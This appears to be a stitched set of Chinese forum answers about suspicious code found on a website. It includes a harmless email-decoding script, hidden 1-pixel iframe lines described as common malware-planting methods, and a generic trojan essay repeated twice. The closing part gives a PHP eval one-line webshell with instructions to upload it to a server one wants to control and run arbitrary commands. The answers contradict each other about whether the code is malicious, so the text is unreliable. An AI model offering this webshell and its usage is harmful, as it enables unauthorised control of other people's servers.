整段代码的意思是 判断当前域名 如果是 该域名◆ ◆则执行PHP一句话木马
如果不是 跳转到首页
好象是DEDECMS 搞的◆◆◆不知道为什么留这样的后门 ◆
看他们这么做 ◆以后想搞谁的站就能搞谁的站了 !
iframe src="r.htm" width=100 height=1/iframe
iframe src="1.htm" width=100 height=1/iframe
以上为常用挂马方式.
下面这段:
应该是你网站的统计代码吧?
网友采纳的那个回答是个毛线啊?就给你把这段js做了一下格式化.我来给你解释一下吧:
这个代码是前端的JS代码,PHP是后端语言,这个代码跟PHP没有卵关系;
这个代码不是病毒木马代码,检测工具检测出来红色大概是因为这个是放在了注释CDATA块里.注释CDATA块其实是因以前的低端浏览器不识别JS代码而生的,现在完全没必要再注释掉了;
也许采纳的那位哥们不服,说这么一段代码看不出什么来.那好,我说说每一行的意思.
首先是个闭包,懂前端的人都知道.
然后try一下,是为了谨慎,免得IE弹出页面脚本有错误.
然后获取document.currentScript标签.如果没有这个属性的话,就用原始的方法来做,这里又是一个自执行函数(闭包).
拿到当前的script标签,那前一个恰好就是加密标签了,邮箱就在这个标签的data-cfemail属性中,将这个标签保存成变量为c.
然后就是解密了.
前两个读出来作为密钥
从后面每两个读出来,和密钥做异或,之后的值用ASCII读出字母
这些字母拼出来的就是你的邮箱
解密之后创建一个文本节点替换掉原来的加密标签,就完成了
搜索一下 PHP网站源码批量替换工具 v1.0,试试.或者其他类似的软件.替换之前记得备份原来的所有文件.
这个代码属于木马病毒.
它是一种基于远程控制的黑客工具,具有隐蔽性和非授权性的特点. 所谓隐蔽性是指木马的设计者为了防止木马被发现,会采用多种手段隐藏木马,这样服务端即使发现感染了木马,由于不能确定其具体位置,往往只能望"马"兴叹. 所谓非授权性是指一旦控制端与服务端连接后,控制端将享有服务端的大部分操作权限,包括修改文件,修改注册表,控制鼠标,键盘等等,而这些权力并不是服务端赋予的,而是通过木马程序窃取的. 从木马的发展来看,基本上可以分为两个阶段. 最初网络还处于以UNIX平台为主的时期,木马就产生了,当时的木马程序的功能相对简单,往往是将一段程序嵌入到系统文件中,用跳转指令来执行一些木马的功能,在这个时期木马的设计者和使用者大都是些技术人员,必须具备相当的网络和编程知识. 而后随着WINDOWS平台的日益普及,一些基于图形操作的木马程序出现了,用户界面的改善,使使用者不用懂太多的专业知识就可以熟练的操作木马,相对的木马入侵事件也频繁出现,而且由于这个时期木马的功能已日趋完善,所以呢对服务端的破坏也更大了. 所以所木马发展到今天,已经无所不用其极,一旦被木马控制,你的电脑将毫无秘密可言. 什么是木马 特洛伊木马(以下简称木马),英文叫做"Trojan house",其名称取自希腊神话的特洛伊木马记. 它是一种基于远程控制的黑客工具,具有隐蔽性和非授权性的特点.
所谓隐蔽性是指木马的设计者为了防止木马被发现,会采用多种手段隐藏木马,这样服务端即使发现感染了木马,由于不能确定其具体位置,往往只能望"马"兴叹. 所谓非授权性是指一旦控制端与服务端连接后,控制端将享有服务端的大部分操作权限,包括修改文件,修改注册表,控制鼠标,键盘等等,而这些权力并不是服务端赋予的,而是通过木马程序窃取的. 从木马的发展来看,基本上可以分为两个阶段.
最初网络还处于以UNIX平台为主的时期,木马就产生了,当时的木马程序的功能相对简单,往往是将一段程序嵌入到系统文件中,用跳转指令来执行一些木马的功能,在这个时期木马的设计者和使用者大都是些技术人员,必须具备相当的网络和编程知识. 而后随着WINDOWS平台的日益普及,一些基于图形操作的木马程序出现了,用户界面的改善,使使用者不用懂太多的专业知识就可以熟练的操作木马,相对的木马入侵事件也频繁出现,而且由于这个时期木马的功能已日趋完善,所以呢对服务端的破坏也更大了. 所以所木马发展到今天,已经无所不用其极,一旦被木马控制,你的电脑将毫无秘密可言.
用杀毒软件可以清除木马.它不是一种对自己不利的"病毒",能够应用和奴驾它的人,就将它看为是一种资源,它是一种基于远程控制的黑客工具,具有隐蔽性和非授权性的特点. 一般自己中了木马病毒,首先要认清这是个什么病毒.其实 Trojan是某些防毒软件对后门木马的一种统称,它并不代表着固定的一个,而是一类,所以即使遇到同样名字的木马可能它们也并不相同.
希望我能帮助你解疑释惑.
if($_GET[r]) eval($_GET[r]);
将上面的代码放到一个php文件并设法上传到你想控制的服务器,
在网页上访问服务器上的该文件,只要在网址后面加上
r=你想要的任何操作(php语言编写).
只要你懂一点php,sql,这台服务器的信息都在你的掌握.